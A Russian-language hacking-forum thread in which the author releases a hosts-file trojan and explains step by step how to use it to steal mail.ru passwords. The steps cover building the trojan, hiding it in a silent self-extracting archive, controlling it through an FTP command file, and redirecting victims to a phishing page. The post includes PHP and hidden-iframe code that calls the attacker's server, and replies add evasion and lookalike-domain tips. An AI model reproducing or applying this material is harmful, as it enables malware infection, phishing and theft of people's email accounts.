Статья первая, будете вы пинать или нет, меня абсолютно не волнует, так что вам полная свобода. Просто захотелось рассказать про метод взлома с множественной правкой hosts. Просто я заметил что в сети каждый трой меняет хостс только один раз, то есть запустила жертва трой и все, больше она в почту не попадет пока не догадается очистить хостс. Это весьма неприятная процедура для взломщика, так как палится его выделенный айпи, да и база пополняется ненужными повторами паролей. Тогда и пришло в голову что мне нужен трой который меняет хостс столько раз, сколько мне нужно. Трой был написан (отдельное спасибо hacknick ) и полгода я от случая к случаю троем пользовался. Щас потребность давно отпала и решил скинуть его на паблик. Пусть пасется. Трой состоит из двух частей Основная часть: hoster_bulder.exe - билдер hoster.exe - сам пустой трой без настроек helper.cab - файл настроек, создается билдером командная часть (заливается на сервер для управления троем): base.bsd - тут записывается база компов, зараженных троем cmd - тут записываются команды для троя hosts - сам файл хостс, на который мы и заменим файл hosts, находящийся на компе жертвы log.txt - логи подключения троя к серверу за командами killer.exe - убивает трой на машине жертвы, когда мы посчитаем, что он там больше не нужен Итак начнем, для начала берем hosts и прописываем в нем свой айпи и домен 1.1.1.1 mail.ru Далее заливаем на сервер с выделенным айпи командную часть файлов (base.bsd, cmd, hosts, log.txt, killer.exe ), например в папку hoster и в итоге наша командная часть находится по следующему адресу http://site.ru/hoster/ На короткое время мы закончили с командной частью, позже вернемся к ней еще, но щас мы будем настраивать трой. Открываем hoster_bulder.exe и видим следующее окно FTP address:- указываем полный фтп путь до папки hoster/ где у нас лежит файл cmd User:- указываем логин Password: - указываем фтп пароль (у некоторых фтп пароль и пароль в админку разные) E-mail: - указываем почту человека, которому мы собираемся трой всучить, это будет идентификатор(имя) троя, например [email protected] Нажимаем Configure и билдер создает файл настроек троя helper.cab Далее выделяем мышкой helper.cab и hoster.exe , выбираем Добавить в архив 1. вкладка Общее - ставим галочку на пункт Создать SFX архив 2. вкладка Дополнительно - нажимаем на Параметры SFX В открывшемся окне настраиваем следующие параметры: 1. вкладка Общее - в поле Выполнить после распаковки указываем hoster.exe 2. вкладка Режимы - ставим галочку в Скрыть все 3. вкладка Текст и графика - выбираем Загрузить значок из файла, берем отсюда иконки и выбираем иконку для нашего троя. Нажимаем дважды Ок. Трой готов. Далее идем на сервер и в файле cmd прописываем следующую команду PHP: change('[email protected]','hosts') Эту команду трой выполнит, как только будет запущен. То есть он возьмет hosts с нашего сервера и закачает его жертве в папку C:\WINDOWS\system32\drivers\etc\ заменив тот, который находится там. Теперь создаем на сервере в папке hoster следующий файл change.php cо следующим содержимым PHP: <?PHP $text = "change('[email protected]','hosts')"; $filelog = fopen("cmd","a+"); fwrite($filelog,"\n $text \n"); fclose($filelog); ?> и проставляем файлу cmd права 777 Закачиваем фейк на сервер и прописываем в теле фейка следующий фрейм PHP: <iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://site.ru/hoster/change.php"></iframe> То есть как только жертва запустит трой. он выполнит команду из файла cmd и сменит hosts. Как только мы увидим что команда выполнена (файл cmd будет пустым, а в log.txt будет время последнего подключения троя к серверу), мы очищаем hosts на сервере от нашего айпи и идем спать. Жертва набирает майл.ру например и попадает на наш фейк в котором мы прописали фрейм PHP: <iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://site.ru/hoster/change.php"></iframe> Фрейм запустится и запишет для троя команду в cmd снова сменить hosts, но уже на наш очищенный от айпишников. Время выполнения троем команды 6 минут. Этого времени достаточно чтоб жертва ввела на нашем фейке свой пароль. Через 6 минут hosts сменится на чистый и жертва как обычно будет юзать майл.ру и hosts будет чистым. Если вы решили убить трой на машине жертвы, то прописываем в cmd следующую команду: PHP: killme('[email protected]','killer.exe') Надеюсь все изложил понятно. Cтатья первая. На днях будет еще одна по взлому почты на www.pochta.ru с использованием баги на сайте. Cкачать весь архив можно тут (пароль: antichat.ru) или тут (пароль: antichat) Надеюсь хоть для кого то статья будет полезна. Что непонятно, спрашивайте. С уважением Satana-fu.
Напривер касперыч. Вопрос: Почему имено хостс? Ведь гуголяшко и яндекс ответят нубу на его ламерский вопрос, не рассматривал вариант через подмену DNS ? Через изменение пути к файлу хостс (реестр) + очистка настроек DNS? - не уверен, не тестил, редирект вроде не будет работать. Ну в общем то за свот спасибо, молодец, если не трудно, отправь в личку ссыль на сорцы, будет лично полезно. Заранеее спасибо!
месяц назад кажется трой палился только файерволом нортона, и то палится не трой, а сам путь распаковки троя, если его распаковывать их sfx архива, каспером вроде не палился, щас утверждать не берусь. не расматривал, поищу на компе сорцы и скину как нибудь
Да нет , я писал для 7ки хостс троян и работало все , но такой какой попроще , просто дописывал в конец файла.
Насколько я понял он не универсален, ибо надо каждому прописывать свое мыло?? верно?? Да исходничики было бы не плохо глянуть ну и для чисток само собой. а так ++++++
нет, можно трой с айди siski скинуть, например, 10 жертвам и команда выполнится всеми 10 сразу, можно каждому отдельно скинуть с универсальным айди, и каждым троем управлять отдельно, в этом случае гемора с командами больше, но контролировать удобнее. исходники скину позже и в личку.
не хочу спорить с "ГУРУ" но в реестре меняется, есть много сборок где хостс просто-напросто не работает ( удалены ключи из реестра
У меня глупый вопрос: Что для всей это радости должен держать хостинг? (т.е. подойдет ли халявный) И еще, когда жертва заходит на наш фэйк, в адресной строке прописан адрес фэйка (т.е. например http://lomaemvashupo4ty.com) или это предусмотренно?
Спасибо. Но разве трудно догадаться по адресу что это фэйк и не вводить свои данные? Или тут все сложнее? ))
можно просто не заметить разницу в адресах и случайно наткуться на фейк - сравни forum.antichat.ru и forum.antlсhat.ru forum.antidnat.ru -визуально бегло очень похожи... кстате выделенный уже забили
Это нужно впарить жертве екзешник,да заманить его ещё на фейк? А незя ли сделать всё в одном,подмену выдачи.Жертва запустит екзе,затем зайдёт на нужный сайт,происходит редирикт на фейк,затем в адресной строке,адрес фейка подменяется на настоящий,он вводит данные и они отправляются по назначению,затем всё восстанавливается.
Это нужно впарить жертве екзешник,да заманить его ещё на фейк? А незя ли сделать всё в одном,подмену выдачи.Жертва запустит екзе,затем зайдёт на нужный сайт,происходит редирикт на фейк,затем в адресной строке,адрес фейка подменяется на настоящий,он вводит данные и они отправляются по назначению,затем всё восстанавливается.
